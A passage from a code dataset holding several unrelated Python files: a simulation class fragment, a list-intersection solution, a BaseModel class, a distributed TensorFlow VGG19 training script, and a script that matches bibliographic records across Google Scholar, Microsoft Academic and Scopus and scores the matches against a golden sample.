handleTimeStepAsAgent(self,agent):\n\t\t#Too ensure concurrency we update agent.next_state in method handleTimeStepAsAgent\n\t\t#After every agent has updated next_state we update states of all agents in method handleTimeStep()\n\n\n\t\t#Finding next_state\n\t\tagent.set_next_state(self.model.find_next_state(agent,self.agents_obj.agents,self.current_time_step))\n\n\tdef endTimeStep(self):\n\t\tself.store_state()\n\n\tdef endSimulation(self):\n\t\treturn self.state_history\n\n\tdef store_state(self):\n\t\tfor state in self.state_history.keys():\n\t\t\tself.state_history[state].append(len(self.state_list[state]))\n\n\tdef convert_state(self,agent):\n\t\tself.state_list[agent.state].remove(agent.index)\n\t\tagent.update_state()\n\t\tself.state_list[agent.state].append(agent.index)\n","sub_path":"Simulator/Simulate.py","file_name":"Simulate.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201544061","text":"#! 
/Users/xiaotongli/anaconda3/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 10/12/18 6:03 PM\n# @Author : Xiaotong Li\n# @School : University of California, Santa Cruz\n# @FileName: intersect.py\n# @Software: PyCharm\n\n\nclass Solution:\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n counts = {}\n res = []\n\n for num in nums1:\n counts[num] = counts.get(num, 0) + 1\n\n for num in nums2:\n if num in counts and counts[num] > 0:\n res.append(num)\n counts[num] -= 1\n\n return res\n","sub_path":"Python/HashTable/intersect.py","file_name":"intersect.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"12666754","text":"#!/usr/bin/python\n\"\"\"\nBaseModel module\n\"\"\"\n\nimport models\nimport uuid\nfrom datetime import datetime\n\n\nclass BaseModel:\n \"\"\"\n BaseModel class\n defines all common attributes/methods for other classes\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Init method\n \"\"\"\n format_time = \"%Y-%m-%dT%H:%M:%S.%f\"\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n self.updated_at = datetime.now()\n if kwargs:\n for k, v in kwargs.items():\n if k == \"created_at\" or k == \"updated_at\":\n # to convert string into a datetime obj\n v = datetime.strptime(v, format_time)\n if k != \"__class__\":\n setattr(self, k, v)\n else:\n models.storage.new(self)\n\n def __str__(self):\n \"\"\"\n __str__: should print: [] () \n \"\"\"\n return \"[{}] ({}) {}\".format(self.__class__.__name__,\n self.id, self.__dict__)\n\n def save(self):\n \"\"\"\n updates the public instance attribute\n updated_at with the current datetime\n \"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"\n returns a dictionary containing all\n keys/values of __dict__ of the instance\n \"\"\"\n\n dic = dict(**self.__dict__)\n dic['__class__'] = str(type(self).__name__)\n dic['created_at'] = self.created_at.isoformat()\n dic['updated_at'] = self.updated_at.isoformat()\n return (dic)\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"512404770","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport sys\nimport tempfile\nimport time\nimport tensorflow as tf\nimport PuzzleSet\nimport vgg19\n\n\n# TODO:\n# 1) persist the model using SavedModel during training\n# 2) use QueueRunner and FileReader to asynchronously load samples\n# 3) GPU suport on RHEL, VRAM specification\n# 4) run on TFoS\n\n\nflags = tf.app.flags\nflags.DEFINE_string(\"data_dir\", \"./puzzle-training-set-Q2\",\n \"Directory for storing mnist data\")\nflags.DEFINE_integer(\"task_index\", None, \n \"Worker task index, should be >= 0. 
task_index=0 is \"\n \"the master worker task the performs the variable \"\n \"initialization \")\nflags.DEFINE_integer(\"replicas_to_aggregate\", None,\n \"Number of replicas to aggregate before parameter update\"\n \"is applied (For sync_replicas mode only; default: \"\n \"num_workers)\")\nflags.DEFINE_integer(\"train_steps\", 2000,\n \"Number of (global) training steps to perform\")\nflags.DEFINE_integer(\"batch_size\", 20, \"Training batch size\")\nflags.DEFINE_float(\"learning_rate\", 0.01, \"Learning rate\")\nflags.DEFINE_boolean(\"sync_replicas\", True,\n \"Use the sync_replicas (synchronized replicas) mode, \"\n \"wherein the parameter updates from workers are aggregated \"\n \"before applied to avoid stale gradients\")\nflags.DEFINE_boolean(\n \"existing_servers\", False, \"Whether servers already exists. If True, \"\n \"will use the worker hosts via their GRPC URLs (one client process \"\n \"per worker host). Otherwise, will create an in-process TensorFlow \"\n \"server.\"\n)\nflags.DEFINE_string(\"ps_hosts\",\"localhost:2222\",\n \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"worker_hosts\", \"localhost:2223,localhost:2224\",\n \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"job_name\", None,\"job name: worker or ps\")\n\nFLAGS = flags.FLAGS\n\n\ndef main(unused_argv):\n puzzleset = PuzzleSet.read_data_sets(FLAGS.data_dir)\n\n if FLAGS.job_name is None or FLAGS.job_name == \"\":\n raise ValueError(\"Must specify an explicit `job_name`\")\n if FLAGS.task_index is None or FLAGS.task_index == \"\":\n raise ValueError(\"Must specify an explicit `task_index`\")\n\n print(\"job name = {0}\".format(FLAGS.job_name))\n print(\"job index = {0}\".format(FLAGS.task_index))\n\n # Construct the cluster and start the server\n ps_spec = FLAGS.ps_hosts.split(\",\")\n worker_spec = FLAGS.worker_hosts.split(\",\")\n\n # Get the number of workers.\n num_workers = len(worker_spec)\n\n cluster = tf.train.ClusterSpec({\n \"ps\": ps_spec,\n \"worker\": worker_spec\n })\n\n # parameter servers stop here.\n if not FLAGS.existing_servers:\n # Not using existing servers. 
Create an in-process server.\n server = tf.train.Server(cluster, job_name=FLAGS.job_name, task_index=FLAGS.task_index)\n if FLAGS.job_name == \"ps\":\n server.join()\n\n is_chief = FLAGS.task_index == 0\n\n # GPU = 0\n cpu = 0\n worker_device = \"/job:worker/task:%d/cpu:%d\" % (FLAGS.task_index, cpu)\n\n def _load_fn(unused_op):\n return 1\n\n greedy = tf.contrib.training.GreedyLoadBalancingStrategy(1, _load_fn)\n\n with tf.device(\n tf.train.replica_device_setter(\n worker_device=worker_device,\n cluster=cluster,\n ps_strategy=greedy)):\n # use Parameter Server to persist the global step.\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n\n # the model\n train_mode = tf.placeholder(tf.bool)\n vgg = vgg19.VGG19()\n vgg.build(train_mode)\n\n # optimizer\n cross_entropy = -tf.reduce_sum(vgg.labels * tf.log(tf.clip_by_value(vgg.prob, 1e-10, 1.0)))\n opt = tf.train.AdamOptimizer(FLAGS.learning_rate)\n\n if FLAGS.sync_replicas:\n if FLAGS.replicas_to_aggregate is None:\n replicas_to_aggregate = num_workers\n else:\n replicas_to_aggregate = FLAGS.replicas_to_aggregate\n\n print(\"replicas_to_aggregate: \" + str(replicas_to_aggregate))\n opt = tf.train.SyncReplicasOptimizer(\n opt,\n replicas_to_aggregate=replicas_to_aggregate,\n total_num_replicas=num_workers,\n name=\"mnist_sync_replicas\"\n )\n\n # train step\n train_step = opt.minimize(cross_entropy, global_step=global_step)\n\n if FLAGS.sync_replicas:\n local_init_op = opt.local_step_init_op\n if is_chief:\n local_init_op = opt.chief_init_op\n\n ready_for_local_init_op = opt.ready_for_local_init_op\n\n # Initial token and chief queue runners required by the sync_replicas mode\n chief_queue_runner = opt.get_chief_queue_runner()\n sync_init_op = opt.get_init_tokens_op()\n\n init_op = tf.global_variables_initializer()\n train_dir = tempfile.mkdtemp()\n\n if FLAGS.sync_replicas:\n sv = tf.train.Supervisor(\n is_chief=is_chief,\n logdir=train_dir,\n init_op=init_op,\n local_init_op=local_init_op,\n ready_for_local_init_op=ready_for_local_init_op,\n recovery_wait_secs=1,\n global_step=global_step\n )\n else:\n sv = tf.train.Supervisor(\n is_chief=is_chief,\n logdir=train_dir,\n init_op=init_op,\n recovery_wait_secs=1,\n global_step=global_step\n )\n\n sess_config = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False,\n device_filters=[\"/job:ps\", \"/job:worker/task:%d\" % FLAGS.task_index]\n )\n\n # The chief worker (task_index==0) session will prepare the session,\n # while the remaining workers will wait for the preparation to complete.\n if is_chief:\n print(\"Worker %d: Initializing session...\" % FLAGS.task_index)\n else:\n print(\"Worker %d: Waitingfor session to be initialized...\" % FLAGS.task_index)\n\n if FLAGS.existing_servers:\n server_grpc_url = \"grpc://\" + worker_spec[FLAGS.task_index]\n print(\"Using existing server at: %s\" % server_grpc_url)\n sess = sv.prepare_or_wait_for_session(server_grpc_url, config=sess_config)\n else:\n sess = sv.prepare_or_wait_for_session(server.target, config=sess_config)\n\n print(\"Worker %d: Session initialization complete.\" % FLAGS.task_index)\n\n if FLAGS.sync_replicas and is_chief:\n # Chief worker will start the chief queue runner and call the init op.\n sess.run(sync_init_op)\n sv.start_queue_runners(sess, [chief_queue_runner])\n\n # Perform training\n time_begin = time.time()\n print(\"Training begins @ %f\" % time_begin)\n\n local_step = 0\n while True:\n # Training feed\n batch_xs, batch_ys = puzzleset.train_next_batch(FLAGS.batch_size)\n 
train_feed = {vgg.images: batch_xs, vgg.labels: batch_ys, vgg.keep_prob: 0.5, train_mode: True}\n _, step = sess.run([train_step, global_step], feed_dict=train_feed)\n local_step += 1\n\n now = time.time()\n print(\"%f: Worker %d: training step %d done (global step: %d)\" % (now, FLAGS.task_index, local_step, step))\n if step >= FLAGS.train_steps:\n break\n\n time_end = time.time()\n print(\"Training ends @ %f\" % time_end)\n training_time = time_end - time_begin\n print(\"Training elapsed time: %f s\" % training_time)\n\n # Validation feed\n val_images, val_labels = puzzleset.validation_batch()\n val_feed = {vgg.images: val_images, vgg.labels: val_labels, train_mode: False}\n val_xent = sess.run(cross_entropy, feed_dict=val_feed)\n print(\"After %d training step(s), validation cross entropy = %g\" % (FLAGS.train_steps, val_xent))\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"image_classify_dist.py","file_name":"image_classify_dist.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"300514607","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 27 15:21:17 2017\n\n@author: paszczak\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 8 17:03:39 2017\n\n@author: paszczak\n\"\"\"\n\nimport json\nimport re\nimport itertools\n#from pprint import pprint\n#import sys\nimport unicodedata\nimport difflib\nimport csv\n# load sample of 400!!!\n\n#metaConditionsThreshold = 1 - defined dynamically below\n\n\n\n\n\nauthorMatchedRecords = []\nyearMatchedRecords = []\ntitle95MatchedRecords = []\nvenueMatchedRecords = []\ndoiUrlmatchedRecords = []\ntitle80MatchedRecords = []\n### data cleansing - improved\n\n#Ti -> simplified Titles, removing spaces, repeated letters, vowels\n#Ti -> simplified Titles, removing spaces, repeated letters, vowels\ndef simplifyTitle (text):\n \"\"\"function normalisng text to lowercase letters, removing all non-alphanumeric signs, then removing all spaces, repeated (double) letters, and vowels from string\"\"\"\n text = text.lower()\n # remove ' inf ', ' sub ' - in MA such notation is used to denote subscripts etc.;\n text = text.replace(' inf ','')\n text = text.replace(' sup ','')\n \n #limiting title string to 150 chars, the maximum in Google Scholar\n text = text[:148]\n \n text = re.sub('[^a-zA-Z0-9\\n\\.]', ' ', text)\n \n \n text = text.replace(\".\", \"\")\n text = text.replace(\" \", \"\")\n text = \" \".join(text.split())\n \n text = ''.join(ch for ch, _ in itertools.groupby(text)) #remove all repeated letters, illiterate -> iliterate\n \n vowels = ('a', 'e', 'i', 'o', 'u')\n text = ''.join([l for l in text if l not in vowels]) #remove all vowels\n \n text = unicodedata.normalize('NFKD', text).encode('ASCII', 'ignore')\n \n text = str(text).encode('utf-8')\n return (str(text))\n\n\ndef matchRecords (doc1, doc2, condition, titleSimilarityThreshold):\n #pubyear2 = int(doc2[\"_ - Y\"])\n #pubyearRange = range((pubyear2-1),(pubyear2+2),1)\n jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n jointURL = [i for i in doc1[\"_ - SU\"] if i in doc2[\"_ - SU\"]]\n if \"_ - DOI\" in doc1 and \"_ - DOI\" in doc2:\n if doc1[\"_ - DOI\"] is not None and doc2[\"_ - DOI\"] is not None:\n jointDOI = [i for i in doc1[\"_ - DOI\"] if i in doc2[\"_ - DOI\"]]\n else:\n jointDOI = []\n else:\n jointDOI = []\n \n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], 
doc2[\"simplifiedTi\"]).ratio()\n \n titleMatch = 0\n yearMatch = 0\n authorMatch = 0\n doiurlMatch = 0\n venueMatch= 0\n askedForConfirmation = 0\n \n \n if titleOverlap >= titleSimilarityThreshold:\n titleMatch = 1 \n if doc1[\"_ - Y\"] == doc2[\"_ - Y\"]:\n yearMatch = 1 \n if len(jointAuthor) != 0:\n authorMatch = 1\n if len(jointURL) + len(jointDOI) > 0:\n doiurlMatch = 1\n if doc1[\"simplifiedVenue\"] == doc2[\"simplifiedVenue\"]:\n venueMatch = 1\n #askForConfirmation (\"fully matched, confirm merge?\", default=\"yes\")\n \n sumofflags = titleMatch + yearMatch + authorMatch + doiurlMatch + venueMatch\n \n if (sumofflags >= condition):\n mergeConfirmation = True\n #print (\"Title, Pub Year, Authors - matched; records hence matched\")\n #print (mergeConfirmation)\n else:\n mergeConfirmation = 0\n \n #else:\n #question = str(\"title match: %s, publ year match: %s, author match: %s\" % (titleMatch, yearMatch, authorMatch))\n #mergeConfirmation = askForConfirmation (question, doc1, doc2, default=\"yes\")\n #askedForConfirmation = 1\n \n \n return (mergeConfirmation, doc1, doc2, askedForConfirmation)\n\n\n\n# DOI/URL\ndef matchDOI(jsonList1, jsonList2, doicount, metaConditionsThreshold):\n matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"_ - DOI\"] is not None:\n for doc2 in jsonList2:\n if doc2[\"_ - DOI\"] == doc1[\"_ - DOI\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1)\n questionCount = questionCount + askedConfirmation\n if mergeConfirmation == True:\n #print(\"yup! maid %s, scopusID %s\" % (doc1[\"_ - Id\"],doc2[\"_ - Id\"]))\n \n matchedEntry[\"scopusID\"] = c[\"_ - Id\"] #scopusID\n matchedEntry[\"maID\"] = b[\"_ - Id\"] #ma ID\n \n flag = 0\n for element in doiUrlmatchedRecords:\n if element[\"maID\"] == b[\"_ - Id\"]:\n flag = 1\n #print(matchedRecords)\n #print(\"ids found already: elementid %s, newid %s\" % (element[\"maID\"], b[\"_ - Id\"]))\n if flag == 0:\n doiUrlmatchedRecords.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n #print(doc1, \"/n\" ,doc2)\n doicount = doicount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n #input(\"Match by DOI ended, with %s entries matched and %s questions asked, press enter...\" % (doicount, questionCount))\n return doicount, questionCount\n \ndef matchURLs (jsonList1, jsonList2, urlcount, metaConditionsThreshold):\n matchedEntry = {}\n questionCount = 0\n for doc2 in jsonList2:\n if doc2[\"_ - SU\"] is not None:\n for doc1 in jsonList1:\n jointURL = [i for i in doc1[\"_ - SU\"] if i in doc2[\"_ - SU\"]]\n if len(jointURL) > 0:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1)\n questionCount = questionCount +askedConfirmation\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n flag = 0\n for element in doiUrlmatchedRecords:\n if element[\"maID\"] == b[\"_ - Id\"]:\n element[\"gsID\"] = c[\"_ - Id\"]\n flag = 1\n #print(\"extended matched record!\")\n if flag == 0:\n matchedEntry = {}\n matchedEntry[\"maID\"] = b[\"_ - Id\"]\n matchedEntry[\"gsID\"] = c[\"_ - Id\"]\n doiUrlmatchedRecords.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n urlcount = urlcount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n #input(\"Match by URL ended, with %s entries matched and %s questions asked, press enter...\" % (urlcount, questionCount))\n \n 
return urlcount, questionCount\n\ntitleMatchedRecords = [] \nmetadataMatchedRecords = [] \n\ndef appendMatchTitle(doc1, doc2, idString1, idString2, submissionArray):\n \n flag = 1\n recordPos = 0\n \n matchedEntry = {}\n matchedEntry[idString1] = doc1[\"_ - Id\"]\n matchedEntry[idString2] = doc2[\"_ - Id\"]\n \n for element in submissionArray:\n \n shared_keyvals = set(element.items()) & set(matchedEntry.items())\n \"\"\"\n logic:\n if 2 keyval pairs the same- do not append duplicate\n if in the loop no match or conflicting match found (meaning: 0-2 shared keys AND 0 shared keyvals or 2 shared keys AND 1 shared keyvals)\n if 1 shared keyvals & 1 shared key -> update record with new, non-conflicting key-val pair\n \"\"\"\n \n if len(shared_keyvals) == 2:\n #exact same match found, change flag in order not to add new entry\n flag = 0\n elif len(shared_keyvals) == 1:\n recordPos = submissionArray.index(element)\n \n if idString2 not in element:\n flag = 0\n element[idString2] = doc2[\"_ - Id\"]\n submissionArray[recordPos].update(element)\n elif idString1 not in element:\n element[idString1] = doc1[\"_ - Id\"]\n submissionArray[recordPos].update(element)\n flag = 0\n \n \n if flag == 1:\n submissionArray.append(dict(matchedEntry))\n #print(\"appended new matched record\")\n \n \n return submissionArray\n\n\n# Ti\n# remove ' inf ' or ' sub '\n\ndef matchTitle(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc2[\"simplifiedTi\"] == doc1[\"simplifiedTi\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchCombined(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if titleOverlap > 0.95:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 0.95)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchTitleSimilar(tiSimilarityThreshold, jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n \n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ 
- AA\"]]\n if titleOverlap > tiSimilarityThreshold:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, tiSimilarityThreshold)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\n\ndef matchVenue(jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #matchedEntry = {}\n questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedVenue\"] is not \"b\\\"b'nn'\\\"\" or doc1[\"simplifiedVenue\"] is not \"b\\\"b''\\\"\":\n for doc2 in jsonList2:\n #titleOverlap = difflib.SequenceMatcher(None, doc1[\"simplifiedTi\"], doc2[\"simplifiedTi\"]).ratio()\n \n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc2[\"simplifiedVenue\"] == doc1[\"simplifiedVenue\"]:\n #print (doc1[\"simplifiedTi\"],doc2[\"simplifiedTi\"])\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n return titlecount, questionCount, submissionArray\n\ndef matchAuthor (jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if len(jointAuthor) != 0:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n \n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n questionCount = 0\n return titlecount, questionCount, submissionArray\n\ndef matchYear (jsonList1, jsonList2,idString1, idString2, titlecount, submissionArray, metaConditionsThreshold):\n #questionCount = 0\n \n for doc1 in jsonList1:\n if doc1[\"simplifiedTi\"] is not None:\n for doc2 in jsonList2:\n #jointAuthor = [i for i in doc1[\"_ - AA\"] if i in doc2[\"_ - AA\"]]\n if doc1[\"_ - Y\"] ==doc2[\"_ - Y\"]:\n (mergeConfirmation, b, c, askedConfirmation) = matchRecords(doc1, doc2, metaConditionsThreshold, 1.0)\n if mergeConfirmation == True:\n #print(\"yup!\")\n \n submissionArray = appendMatchTitle (b, c, idString1, idString2, submissionArray)\n \n titlecount = titlecount+1\n #elif mergeConfirmation == False:\n #print(\"merge declined manually\")\n \n questionCount = 0\n return titlecount, questionCount, submissionArray\n\n\n### compare with golden standard\n\ndef calculateOverlap (x,y):\n overlapFlag = 0\n \n for element in x:\n if \"maID\" in element:\n for match in y:\n if \"maID\" in match:\n if element[\"maID\"] == match[\"maID\"]:\n shared_items = set(element.items()) & set(match.items())\n if len(element) == len(shared_items) and len(element) == len(match):\n overlapFlag = overlapFlag+1\n elif \"gsID\" in element:\n for match in y:\n if \"gsID\" in match:\n if element[\"gsID\"] == 
match[\"gsID\"]:\n shared_items = set(element.items()) & set(match.items())\n if len(element) == len(shared_items) and len(element) == len(match):\n overlapFlag = overlapFlag+1\n precision = overlapFlag/(len(x))\n recall = overlapFlag/(len(y))\n F = 2 * (precision * recall)/(precision+recall)\n \n resultsArray = []\n resultsArray.append(precision)\n resultsArray.append(recall)\n resultsArray.append(F)\n \n return resultsArray\n \n \n\n\n############ reading in files\n# golden standard sample of matches\ndirectory= \"data/overlapGoldenSample/\"\nwith open(str(directory+\"overlap_400_matches2.json\")) as data_file:\n #data = list(data_file)\n matchesJson = json.load(data_file)\n\n\n\n# cleansed ca400 records from each database\nfilename = \"_keyword_1_natural_sciences.json\"\ndirectory= \"data/filteredJSONs/\"\n\nwith open(str(directory+\"google_scholar_sample400\"+filename), 'r') as fp:\n gsJson400 = json.load(fp)\n\nwith open(str(directory+\"MA_sample400\"+filename), 'r') as fp:\n maJson400 = json.load(fp)\n\nwith open(str(directory+\"scopus_sample400\"+filename), 'r') as fp:\n scopusJson400 = json.load(fp)\n \ndoicount = 0\nurlcount = 0\n\n\nmaScopCount = 0\ngsScopCount = 0\ngsMaCount = 0\nmetaConditionsThreshold = 0\n\nfor i in range(1,6):\n metaConditionsThreshold = i\n print(metaConditionsThreshold)\n print(\"metaConditionThreshold\")\n \n print(\"doi-url matching...\")\n #DOI matching: SCOPUS <-> MA, both sides\n (doicount, questionCountDOI) = matchDOI (maJson400, scopusJson400, doicount, metaConditionsThreshold)\n #askForConfirmation (\"finished matching DOIs, begin with URLs (GoogleScholar - MA)?\", \"\", \"\", default=\"yes\")\n (urlcount, questionCountURL) = matchURLs (maJson400, gsJson400, urlcount, metaConditionsThreshold)\n \n print(\"title matching...\")\n (maScopCount, questionCountTitle, titleMatchedRecords) = matchTitle (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, titleMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, titleMatchedRecords) = matchTitle (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, titleMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, titleMatchedRecords) = matchTitle (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, titleMatchedRecords, metaConditionsThreshold)\n \n print(\"author matching...\")\n (maScopCount, questionCountTitle, authorMatchedRecords) = matchAuthor (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, authorMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, authorMatchedRecords) = matchAuthor (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, authorMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, authorMatchedRecords) = matchAuthor (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, authorMatchedRecords, metaConditionsThreshold)\n \n print(\"pubyear matching...\")\n (maScopCount, questionCountTitle, yearMatchedRecords) = matchYear (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, yearMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, yearMatchedRecords) = matchYear (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, yearMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, yearMatchedRecords) = matchYear (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, yearMatchedRecords, metaConditionsThreshold)\n \n print(\"title_similar 1 matching...\")\n (maScopCount, questionCountTitle, 
title80MatchedRecords) = matchTitleSimilar (0.9, maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, title80MatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, title80MatchedRecords) = matchTitleSimilar (0.9, gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, title80MatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, title80MatchedRecords) = matchTitleSimilar (0.9, gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, title80MatchedRecords, metaConditionsThreshold)\n \n print(\"title_similar 2 matching...\")\n (maScopCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, title95MatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, title95MatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, title95MatchedRecords) = matchTitleSimilar (0.95, gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, title95MatchedRecords, metaConditionsThreshold)\n \n print(\"pub venue matching...\")\n (maScopCount, questionCountTitle, venueMatchedRecords) = matchVenue (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, venueMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, venueMatchedRecords) = matchVenue (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, venueMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, venueMatchedRecords) = matchVenue (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, venueMatchedRecords, metaConditionsThreshold)\n \n \n \n #doiURLresults = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n combinedMatchedRecords = list(doiUrlmatchedRecords)\n \n print(\"combined matching...\")\n (maScopCount, questionCountTitle, combinedMatchedRecords) = matchCombined (maJson400, scopusJson400, \"maID\", \"scopusID\", maScopCount, combinedMatchedRecords, metaConditionsThreshold)\n (gsScopCount, questionCountTitle, combinedMatchedRecords) = matchCombined (gsJson400, scopusJson400, \"gsID\", \"scopusID\", gsScopCount, combinedMatchedRecords, metaConditionsThreshold)\n (gsMaCount, questionCountTitle, combinedMatchedRecords) = matchCombined (gsJson400, maJson400, \"gsID\", \"maID\", gsMaCount, combinedMatchedRecords, metaConditionsThreshold)\n \n \n \n doiURLresults = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n titleResults = calculateOverlap (titleMatchedRecords, matchesJson)\n title80Results = calculateOverlap (title80MatchedRecords, matchesJson)\n title95results = calculateOverlap 